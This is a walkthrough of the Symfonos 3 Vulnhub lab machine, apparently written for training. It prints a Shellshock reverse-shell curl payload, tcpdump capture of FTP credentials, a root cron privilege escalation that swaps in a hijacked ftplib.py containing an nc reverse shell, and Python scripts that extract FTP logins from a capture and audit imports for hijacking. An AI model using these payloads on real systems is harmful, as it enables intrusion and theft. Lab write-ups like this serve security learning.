Symfonos 3
Symfonos 3 Vulnhub Walkthrough
Enumeration
Nmap
nmap -sC -sV -oA nmap/sym3 192.168.1.114
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 02:39 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00016s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
| 256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_ 256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:DA:E2:26 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
Browsing to the IP shows a near-empty page.

Viewing the page source with the browser's inspector turns up a hint:

Next, directory brute-forcing with dirb and gobuster.
dirb & gobuster
dirb http://192.168.1.114/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 26 02:42:28 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/cgi-bin/ (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.114/gate/
+ http://192.168.1.114/index.html (CODE:200|SIZE:241)
+ http://192.168.1.114/server-status (CODE:403|SIZE:278)
---- Entering directory: http://192.168.1.114/gate/ ----
+ http://192.168.1.114/gate/index.html (CODE:200|SIZE:202)
-----------------
END_TIME: Tue May 26 02:42:38 2020
DOWNLOADED: 9224 - FOUND: 4
dirb finds a directory called /gate/.

Its index page holds nothing interesting, and dirb's common.txt wordlist finds nothing further under it, so I switched to gobuster with the larger directory-list-2.3-medium.txt against /gate/:
gobuster dir -u http://192.168.1.114/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.114/gate/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/26 02:44:57 Starting gobuster
===============================================================
/cerberus (Status: 301)
===============================================================
2020/05/26 02:45:39 Finished
===============================================================
gobuster finds /gate/cerberus, and enumerating further beneath it turns up /tartarus, which looks like this:

The page source there says it may be misleading:

So /gate is a rabbit hole, and it is back to square one. I enumerated the web root again with dirbuster, this time including /cgi-bin/ (dirb reported it as 403, which means the directory exists and is simply not listable, not that it is empty):

That turns up an underworld script under /cgi-bin.

Navigating to /cgi-bin/underworld returns this:

Hmm. A script under /cgi-bin is executed by Apache as CGI, and CGI hands the request headers to the script as environment variables (User-Agent arrives as HTTP_USER_AGENT). If the script is bash, or shells out to it, an unpatched bash parses a crafted header value as a function definition and runs whatever command follows it: Shellshock, CVE-2014-6271. The PentesterLab exercise on that CVE is where I found the technique.
Exploitation
Reverse Shell
The reverse shell goes in the User-Agent header; everything after the "() { :; };" function body is the command the vulnerable bash executes. The IP addresses below are lab addresses and differ between sessions in this walkthrough, so substitute your own attacker and target IPs:
curl -A "() { :; }; /bin/bash -c 'nc 192.168.1.117 443 -e /bin/sh'" http://192.168.1.118/cgi-bin/underworld
Before sending it, start a listener on our machine:
nc -nlvp 443

That gives a reverse shell as the web server user. Upgrade it to a proper TTY with Python:
python -c 'import pty; pty.spawn("/bin/bash")'
Something on the box talks to the local FTP server (pspy, further down, shows what), and FTP sends credentials in the clear, so capture the loopback interface with tcpdump and write the pcap to /tmp. A port filter keeps the file down to FTP control traffic:
tcpdump -i lo -w /tmp/ftplog.pcap port 21
Let it run for a minute or two, stop it, and transfer the pcap to the attacking machine with nc. Open it in Wireshark, filter on tcp.port == 21, right-click a packet and choose Follow TCP Stream:

The stream contains the FTP login: user hades, password PTpZTfU4vxgzvRBE.
su to hades with that password.
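The Follow TCP Stream step can also be done with a short script, which is handy when moving the pcap off the box is awkward or when a capture holds many logins. The code below is an added example, not the walkthrough's own: it parses classic pcap files as written by tcpdump -w (Ethernet and Linux cooked link types), reassembles each client-to-server stream to port 21 by sequence number, and pulls out USER/PASS pairs. It needs Python 3 (the target only has 2.7, so run it on the attacking machine); build_sample_pcap() fabricates a tiny capture for testing and is constructed data, not the real capture from the box.

```python
"""Extract FTP logins from a pcap without Wireshark (added example)."""
import struct
import sys

LINKTYPE_ETHERNET = 1      # tcpdump -i lo / -i eth0 on Linux
LINKTYPE_LINUX_SLL = 113   # tcpdump -i any


def read_pcap(data):
    """Yield (linktype, frame_bytes) for every record in a classic pcap."""
    (magic,) = struct.unpack("<I", data[:4])
    if magic in (0xA1B2C3D4, 0xA1B23C4D):      # usec / nsec, little-endian
        end = "<"
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):    # big-endian writer
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    (linktype,) = struct.unpack(end + "I", data[20:24])
    off = 24
    while off + 16 <= len(data):
        _sec, _frac, incl_len, _orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len


def tcp_segments(records):
    """Yield ((src, sport, dst, dport), seq, payload) for TCP segments that carry data."""
    for linktype, frame in records:
        if linktype == LINKTYPE_ETHERNET and frame[12:14] == b"\x08\x00":
            ip = frame[14:]
        elif linktype == LINKTYPE_LINUX_SLL and frame[14:16] == b"\x08\x00":
            ip = frame[16:]
        else:
            continue
        if len(ip) < 20 or ip[0] >> 4 != 4 or ip[9] != 6:   # IPv4 carrying TCP only
            continue
        ihl = (ip[0] & 0x0F) * 4
        (total_len,) = struct.unpack("!H", ip[2:4])
        tcp = ip[ihl:total_len]
        if len(tcp) < 20:
            continue
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield (ip[12:16], sport, ip[16:20], dport), seq, payload


def dotted(raw):
    return ".".join(str(b) for b in raw)


def ftp_logins(pcap_bytes, port=21):
    """Return [(client_ip, server_ip, user, password), ...] found in the capture."""
    streams = {}
    for key, seq, payload in tcp_segments(read_pcap(pcap_bytes)):
        if key[3] == port:                            # client -> server direction only
            streams.setdefault(key, {})[seq] = payload   # keyed by seq: drops retransmits
    found = []
    for (src, _sp, dst, _dp), segs in streams.items():
        data = b"".join(segs[s] for s in sorted(segs))   # reorder by sequence number
        user = None
        for line in data.split(b"\r\n"):
            if line[:5].upper() == b"USER ":
                user = line[5:].decode("utf-8", "replace")
            elif line[:5].upper() == b"PASS " and user is not None:
                found.append((dotted(src), dotted(dst), user, line[5:].decode("utf-8", "replace")))
                user = None
    return found


def build_sample_pcap(commands, client="10.0.0.5", server="127.0.0.1"):
    """Constructed test capture: one Ethernet/IPv4/TCP frame per client command."""
    def ip4(text):
        return bytes(int(x) for x in text.split("."))
    records, seq = b"", 1000
    for i, cmd in enumerate(commands):
        payload = cmd + b"\r\n"
        tcp = struct.pack("!HHIIBBHHH", 40001, 21, seq, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), i, 0, 64, 6, 0,
                         ip4(client), ip4(server)) + tcp
        frame = b"\x00" * 12 + b"\x08\x00" + ip
        records += struct.pack("<IIII", 1590475000 + i, 0, len(frame), len(frame)) + frame
        seq += len(payload)
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    return header + records


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as fh:
        for client, server, user, password in ftp_logins(fh.read()):
            print("%s -> %s  USER %s  PASS %s" % (client, server, user, password))
```

Run it as `python3 ftpcreds.py ftplog.pcap`; the sequence-number reassembly is what makes it robust to the out-of-order and retransmitted segments a real capture contains, which a plain `strings` over the file is not.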

Privilege Escalation
Run pspy as hades to watch the processes that cron and root spawn:

It shows a script under /opt/ftpclient being executed periodically as root.

The files under /opt/ftpclient are not writable by hades, though, so the script itself cannot be edited.
Python Library Hijacking
After researching and asking the machine's author how this works: it is Python library hijacking. When the root job imports a module, the interpreter walks the directories in sys.path in order and loads the first match, so if any directory on that list, or the module file it finds there, is writable by a lower-privileged user, that user decides what code root runs. Print the search order:
python -c 'import sys; print("\n".join(sys.path))'
This lists, in order, every directory the interpreter searches when resolving an import.

There are several directories here, and the first hit wins.

Reading /opt/ftpclient/ftpclient.py shows that it imports ftplib.
Check the standard-library copy in /usr/lib/python2.7:
ls -la /usr/lib/python2.7 | grep ftplib

ftplib.py is group-writable and owned by group gods, and hades is a member of gods, so hades can replace the module that the root job imports.
Rename the original to a backup (ftplib.py.bak, say), then create a fresh ftplib.py in its place with nano.
Put a reverse shell in it; the payload runs at import time, inside the root process:
import os
# Executed the moment ftpclient.py does "import ftplib" as root.
os.system("nc -e /bin/bash 192.168.1.116 4444")
Save the file and start a listener on the attacking machine:
nc -nlvp 4444
Within about a minute the cron job runs ftpclient.py as root, imports the replaced ftplib, and the shell connects back:

Upgrade it with the same python pty one-liner, and that shell is root.
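Checking every import of a privileged script by hand, as done above with ls and grep, does not scale; the script below is an added example (not the walkthrough's or the machine author's code) that automates it and then proves the precedence rule. audit_imports() resolves each module name the way the interpreter does, reports whether the resolved file is writable by the current user, and lists any earlier sys.path directories into which a shadow copy could be dropped; either route is a hijack. demo_shadow() shows the second route for real by shadowing the standard library's ftplib in a throwaway interpreter. It is written for Python 3; build_lab() creates a constructed fixture for testing, and the module names are this example's own choices.

```python
"""Find and prove Python import hijacks (added example)."""
import os
import subprocess
import sys
import tempfile


def resolve_module(name, paths):
    """First entry on `paths` satisfying `import name`, as (index, file).
    A package dir wins over a module file in the same entry, as in CPython.
    Returns (None, None) when nothing on the path provides the module."""
    for index, entry in enumerate(paths):
        base = entry or os.getcwd()            # '' on sys.path means the cwd
        for candidate in (os.path.join(base, name, "__init__.py"),
                          os.path.join(base, name + ".py")):
            if os.path.isfile(candidate):
                return index, candidate
    return None, None


def audit_imports(names, paths=None):
    """Per module: where it resolves, whether we can overwrite that file, and
    which earlier search-path directories we could plant a shadow copy in."""
    paths = list(sys.path if paths is None else paths)
    report = {}
    for name in names:
        index, target = resolve_module(name, paths)
        earlier = [p or os.getcwd() for p in (paths if index is None else paths[:index])]
        report[name] = {
            "resolved": target,
            "file_writable": bool(target) and os.access(target, os.W_OK),
            "writable_earlier_dirs": [d for d in earlier
                                      if os.path.isdir(d) and os.access(d, os.W_OK)],
        }
    return report


def hijackable(entry):
    """True if either replacement route is open for this module."""
    return entry["file_writable"] or bool(entry["writable_earlier_dirs"])


def demo_shadow(module="ftplib"):
    """Write a fake `module`.py into a temp dir, put that dir first via
    PYTHONPATH, and ask a fresh interpreter what `import module` yields.
    Returns the child's stdout: the fake's marker if shadowing worked."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, module + ".py"), "w") as fh:
            fh.write("HIJACKED = %r\n" % ("fake %s loaded from %s" % (module, tmp)))
        env = dict(os.environ, PYTHONPATH=tmp)
        code = "import %s as m; print(getattr(m, 'HIJACKED', 'stdlib'))" % module
        result = subprocess.run([sys.executable, "-c", code], env=env,
                                capture_output=True, text=True, check=False)
        return result.stdout.strip()


def build_lab():
    """Constructed fixture: a fake 'stdlib' dir holding ftplib.py and an empty
    writable 'userdir' meant to precede it on the search path."""
    root = tempfile.mkdtemp(prefix="hijack-lab-")
    stdlib, userdir = os.path.join(root, "stdlib"), os.path.join(root, "userdir")
    os.mkdir(stdlib)
    os.mkdir(userdir)
    target = os.path.join(stdlib, "ftplib.py")
    with open(target, "w") as fh:
        fh.write("# stand-in for /usr/lib/python2.7/ftplib.py\n")
    return {"stdlib": stdlib, "userdir": userdir, "stdlib_ftplib": target}


if __name__ == "__main__":
    # Usage on a box: python3 audit.py ftplib socket json   (names the target script imports)
    for name, entry in audit_imports(sys.argv[1:] or ["ftplib"]).items():
        print(name, "->", entry["resolved"],
              "HIJACKABLE" if hijackable(entry) else "ok",
              entry["writable_earlier_dirs"])
    print(demo_shadow())
```

On the Symfonos box the audit flags ftplib through the first route (the file in /usr/lib/python2.7 is group-writable by gods); the PYTHONPATH demo is the same mechanism from the other direction, which is why a privileged cron job should run with a clean environment and import only from root-owned, non-writable directories.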

cd /root and read flag.txt.

Congratulations!